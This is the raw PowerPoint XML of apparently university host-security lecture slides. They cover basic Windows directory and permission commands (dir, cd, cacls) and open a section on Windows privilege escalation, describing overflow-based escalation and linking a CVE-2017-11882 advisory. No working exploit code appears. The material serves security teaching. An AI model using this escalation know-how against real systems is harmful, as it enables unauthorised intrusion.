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80"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81"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282"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25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53850-6BF0-4E00-9FAB-B919E6DCCA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FC4226-A5F4-4A3E-9314-97CF0F6D7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0FACB4-EDAF-4B03-838A-6F8D2D41D74F}"/>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2319EC7D-B4A2-423D-85E5-26311C79F6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2A3FC0-BF88-4798-8465-221486840A3B}"/>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79138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550E4-1EDC-42D1-9375-FC6D15D3597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C8AB06-AFF8-46AE-8A8C-2B5641369DB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5979DD-8E5E-4545-9F98-AD5FC8B4A23C}"/>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913D8010-43EB-4322-B870-3EE6DDFAD7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31A8E0-FC59-4A72-A738-86601DE37D21}"/>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262669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B6ED68-9382-4AB7-A3DD-E82696D3A6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6D822D-39DC-4BCB-A97B-5ED000567EF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7A06A0-7A4C-40EF-94D8-9A639ACBC302}"/>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EFB91A0B-F8B3-4497-9679-12FD138238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E0774D-2474-4F92-86C0-798BAC5BA321}"/>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3494392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29232" y="5156200"/>
            <a:ext cx="8179003" cy="1701800"/>
            <a:chOff x="21924" y="3867150"/>
            <a:chExt cx="6134252" cy="127635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24" y="3867150"/>
              <a:ext cx="6134252" cy="12763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F:\百度云\logo.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr userDrawn="1"/>
          </p:nvPicPr>
          <p:blipFill>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21924" y="4125054"/>
              <a:ext cx="1410747" cy="299951"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="F:\百度云\logo.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D281AE1F-8688-47A5-94F1-E2C490F03AA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7220517" y="357522"/>
            <a:ext cx="2258216" cy="480137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F98B5197-73FD-42E0-8173-02A31EF254E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9478733" y="312589"/>
            <a:ext cx="2377907" cy="619183"/>
            <a:chOff x="7109050" y="234441"/>
            <a:chExt cx="1783430" cy="464387"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2" name="图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b="37941"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7109050" y="234441"/>
              <a:ext cx="802431" cy="464387"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="图片 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8228B04A-B5D3-4EBA-858F-4F9BD52F94C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62058"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7824894" y="257588"/>
              <a:ext cx="1067586" cy="377740"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371987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6534" y="164637"/>
            <a:ext cx="1069908" cy="997744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050"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3339" y="5138377"/>
            <a:ext cx="8176684" cy="170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userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="5138376"/>
            <a:ext cx="8176684" cy="1719624"/>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39348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CE0F7-740D-4E5A-9856-97E060ECA3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7A4AE1-B422-40EE-B1C8-C9A649CBD6A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9B9294-1390-420C-9B35-FC6175EC4775}"/>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FD7F1466-E0B9-4D76-8732-675870A608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C47792-AC3E-4061-91A7-EADF943A78F1}"/>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74003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3400C-5864-433C-BD6C-6888F4866D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5F4FCE-9C83-44C9-977A-EDC6BD4DC7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49272FE-58EE-46E3-B3B1-975B1280BB14}"/>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3FE6399B-63CA-4D16-AD2B-D9927CF815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B9542C-1F76-489E-BCAF-B986463E623E}"/>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122558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BAA0D-322C-4129-B2E2-A768EF11F6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94E827-CA0D-4299-826B-74DE19B865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C96653B-4D72-476E-A4E9-104F5359A98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A5D3F0-7D63-4240-942D-D6B08FA4AB2F}"/>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9A8502DB-D9E8-4F8B-87AA-0F0BD6DD0C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FF28D4-9B4A-45E2-8508-14A271991B57}"/>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1338782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03806-F9C8-43DF-88A6-54569DE9DE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E45EAC-E67F-4CA8-9E88-F8CF884AD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CAA6730-79FA-4762-996F-9E786B7BE4C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C40F3C3-51A9-4B2E-B622-4F47440546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33BED2A-7A46-45CC-93CC-58D1528B6EC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18C92BB-2372-42CF-A54F-EE99B053BD77}"/>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8" name="页脚占位符 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CF01EFF-7E78-4C7D-B088-10BD54E60F9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00272F-9E75-4ED8-8092-D4B6C8E14CF3}"/>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106550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FC88E-02E2-4980-BC54-5D7DEC9C14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2971DC-4F3D-4D7D-B587-F1621FB6345C}"/>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4" name="页脚占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF26E133-70C8-419F-8735-6C1F5C62BB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BA2C94-2524-4CD5-8299-6924857A3E4A}"/>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391517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5D503BC-964C-4A58-8B84-1BF80EC31DD5}"/>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3" name="页脚占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EC04D8E-E406-4697-8857-F4EDC82A03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9291CA-B759-4CA6-86F0-3D67C988C6FC}"/>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235223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B861A-C198-400E-B0F5-6EA7D60A96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CB0980-7166-47E7-BAC0-5F9FECB5C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BCC3817-EA9B-41EA-AE97-486B89300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F686B5-3287-4D50-A773-503915D2751C}"/>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9098F535-D741-49BC-A30F-A7DAE34CD3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AF6690-8D23-4B96-A2A8-7F07F78A7A68}"/>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21469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B2261-73D5-4AD4-9255-50096C0B85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B92612D-7F41-414B-BDC8-B32196619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D1CD85-4562-4FE0-BC76-FA7EC806F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BD55CD1-0A54-4AAB-8DAD-9040A9D71DF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DC0D28AB-F35B-4B85-ABBE-671B32FF4906}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2019/7/2</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C19701B-7E45-4DAF-8554-56BF294A79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0B49AB-CD5F-43B9-90A8-8F6FA0CF5AE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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352375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9A5EF6-C678-4C07-A3DA-84C9F547B9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970765A-D133-44D2-AFB3-38E16BF2F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D69D5E0-9E64-474B-83A6-24D87EF4F2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D28AB-F35B-4B85-ABBE-671B32FF4906}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2019/7/2</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A337776-2366-4494-AFD7-5905EA7A01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70C2F4-A37C-4116-B7B1-1E56AC996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2B86A-32D0-45FE-A6DE-8C72F9732BF2}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1086500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hyperlink" Target="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882" TargetMode="Externa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623393" y="2520115"/>
            <a:ext cx="11125548" cy="1044503"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="121920" tIns="60960" rIns="121920" bIns="60960" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3733" b="1" dirty="0">
                <a:latin typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>主机安全</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3733" b="1" dirty="0">
              <a:latin typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{260D9E52-70CA-480C-9BE5-111E8D70BCD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17816" y="1316766"/>
            <a:ext cx="12192000" cy="748988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4267" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="方正姚体" panose="02010601030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正姚体" panose="02010601030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>电子科技大学 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4267" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="方正姚体" panose="02010601030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正姚体" panose="02010601030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4267" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="方正姚体" panose="02010601030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正姚体" panose="02010601030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>网络空间安全研究中心（暨学院）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4267" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="方正姚体" panose="02010601030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正姚体" panose="02010601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220959" y="742260"/>
            <a:ext cx="11827702" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>8.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>目录文件操作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>目录名或文件名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>] [/S][/W][/P][/A] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>列出目录 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>: /s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查找子目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>只显示文件名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>分页</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>显示隐藏文件 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> format.exe /s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：查找该盘的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>format.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件并报告位置</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	md (MKDIR) [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>目录名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>]  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：创建目录　　 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	cd (CHDIR) [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>目录名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>] PS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：可以使用相对目录或绝对目录 进入目录 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	cd AA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：进入当前文件夹下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>AA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>目录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	cd .. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：进入上一个文件夹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>cd \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>返回根目录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	cd c:\windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：进入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>c:\windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件夹</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>rmdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>) [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>目录名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：删除目录 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3E1B21F-FECB-471B-9358-2B53EF6D28E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="4563118"/>
            <a:ext cx="8137361" cy="2137397"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F56FC1C0-8C0E-44BB-87D5-BCF5FA1E71A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="47707"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251997" y="5112687"/>
            <a:ext cx="5530581" cy="949347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="153823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220959" y="742260"/>
            <a:ext cx="11827702" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>9.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系统权限配置</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>cacls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> c:\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>cacls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> c:\windows\a.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>a.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的权限配置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBC66FB2-EF01-457B-B755-D647E5CDABEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="843237" y="2827175"/>
            <a:ext cx="10505526" cy="1762805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1693981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二、提权准备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3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>了解相关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>提权相关知识</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(1)	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>本地提权</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>★溢出提权</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>远程溢出：远程溢出提权是指攻击者只需要与服务器建立连接，然后根据系统的漏洞，使用响应的溢出程序，即可获取到远程服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>权限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
